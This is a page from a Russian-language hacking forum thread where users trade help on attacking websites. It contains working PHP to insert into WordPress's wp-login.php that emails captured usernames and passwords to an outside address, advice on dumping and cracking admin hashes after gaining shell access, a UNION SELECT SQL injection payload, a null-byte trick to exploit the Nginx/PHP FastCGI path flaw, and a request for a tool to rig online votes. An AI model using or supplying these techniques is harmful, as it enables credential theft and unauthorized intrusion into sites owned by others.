[Задай Вопрос - Получи Ответ]

Discussion in 'Веб-уязвимости' started by Rombl4, 17 Nov 2008.

  1. Angelika

    Angelika New Member

    Joined:
    8 Sep 2018
    Messages:
    5
    Likes Received:
    2
    Reputations:
    0
    Спасибо за ответ! А стоимость Вы в чем указали? В тысячах рублей?
     
  2. dmax0fw

    dmax0fw Level 8

    Joined:
    31 Dec 2017
    Messages:
    107
    Likes Received:
    131
    Reputations:
    46
    возможно дело в short_open_tag
    попробуй записать так
    PHP:
    fwrite($b, '<?php phpinfo(); ?>');
     
  3. Sensoft

    Sensoft Member

    Joined:
    14 Jun 2015
    Messages:
    398
    Likes Received:
    38
    Reputations:
    1
    Нет, та же ошибка
     
  4. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    Ругается именно на <? ?>, если просто текст записать, то пишет.
     
  5. likepro

    likepro Banned

    Joined:
    9 May 2015
    Messages:
    22
    Likes Received:
    6
    Reputations:
    0
    Да
     
  6. neur0funk

    neur0funk Member

    Joined:
    9 May 2018
    Messages:
    22
    Likes Received:
    18
    Reputations:
    12
  7. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    copy system eval и так далее выключены. Уже залился через локал инклуид.
    Если бы было так просто я бы не спрашивал.
     
    #767 karkajoi, 28 Sep 2018
    Last edited: 28 Sep 2018
  8. Pilot2017

    Pilot2017 New Member

    Joined:
    2 Jul 2017
    Messages:
    43
    Likes Received:
    2
    Reputations:
    0
    Подскажите программу для накрутки голосов в интернет-голосованиях. Спасибо!
     
  9. erwerr2321

    erwerr2321 Elder - Старейшина

    Joined:
    19 Jun 2015
    Messages:
    4,236
    Likes Received:
    26,250
    Reputations:
    148
    curl ?
     
  10. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Если еще проще, то создать тему с просьбой перейти по ссылке и проголосовать за Вас!
     
  11. k0ks

    k0ks New Member

    Joined:
    21 Dec 2016
    Messages:
    15
    Likes Received:
    1
    Reputations:
    0
    Имея шел доступ, как узнать логин\пароль от админки wordpress-а, установленном на этом сайте?
     
  12. dmax0fw

    dmax0fw Level 8

    Joined:
    31 Dec 2017
    Messages:
    107
    Likes Received:
    131
    Reputations:
    46
    посмотреть в конфиге пароль от бд, подключиться к базе и глянуть в wp_users, ну а далее сбрутить хеш
    ну и второй вариант: повесить снифер в код wordpress, который при логине в админку будет писать введённые данные в файл
     
    crlf and Spinus like this.
  13. k0ks

    k0ks New Member

    Joined:
    21 Dec 2016
    Messages:
    15
    Likes Received:
    1
    Reputations:
    0
    А может есть какой-нибудь скрипт, который будет вытаскивать эти данные самостоятельно?
    Ну или нового суперюзера создавать в ВП?
     
  14. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    Так если есть shell доступ к бд , не проще просто сменить пароль админу или добавить нового ?
     
  15. dmax0fw

    dmax0fw Level 8

    Joined:
    31 Dec 2017
    Messages:
    107
    Likes Received:
    131
    Reputations:
    46
    проще, но вопрос был как узнать логин/пароль админа, без дополнительных уточнений
     
    #775 dmax0fw, 17 Dec 2018
    Last edited: 17 Dec 2018
  16. porfiry

    porfiry Member

    Joined:
    4 Jan 2018
    Messages:
    63
    Likes Received:
    28
    Reputations:
    0
    У кого-нибудь есть Foca на винде? есть вопрос
     
  17. Alaich

    Alaich Member

    Joined:
    16 Oct 2015
    Messages:
    28
    Likes Received:
    13
    Reputations:
    7
    В начало файла wp-login.php добавить:
    PHP:
    if (!empty($_POST['log']) && !empty($_POST['pwd'])) {
    $msg "Login: " $_POST['log'] . "\n";
    $msg .= "Pass: " $_POST['pwd'];
    @
    mail('[email protected]''What you need'$msg);
    }
     
  18. karkajoi

    karkajoi Well-Known Member

    Joined:
    26 Oct 2016
    Messages:
    488
    Likes Received:
    459
    Reputations:
    8
    union select 1,2,3,(select@%20from(select@:=0x00,(select 1 from(select*from user ORDER BY userid ASC limit 0,5)w where(@:=concat(@,0x3c62723e,username))))q) как тут задать бд к которой обращаться ?
     
  19. romanshkabo

    romanshkabo New Member

    Joined:
    3 Jan 2019
    Messages:
    2
    Likes Received:
    0
    Reputations:
    0
    Нужна помощь с реализацией уязвимости. Acunetix Web Scanner находит уязвимость:
    Nginx PHP code execution via FastCGI
    Vulnerability description
    A critical security issue was reported on servers that run Nginx and PHP via FastCGI. This issue may allow attackers to execute their own PHP code on the system.The problem is not caused by nginx itself, it's related with the PHP option cgi.fix_pathinfo. When this option is enabled, PHP will rewrite SCRIPT_FILENAME and PATH_INFO parameters. When combined with Nginx, this turns into a security issue.
    This vulnerability affects Web Server.
    Discovered by: Scripting (Nginx_PHP_FastCGI_Code_Execution_File_Upload.script).

    Насколько понял, данная уязвимость позволяет выполнить произвольный PHP. Пошарился по гуглу, ничего интересного не нашел. Подскажите что почитать или в какую сторону копать.
     
  20. neur0funk

    neur0funk Member

    Joined:
    9 May 2018
    Messages:
    22
    Likes Received:
    18
    Reputations:
    12
    очень древний баян, года так 10, добавь %00.php или /x00.php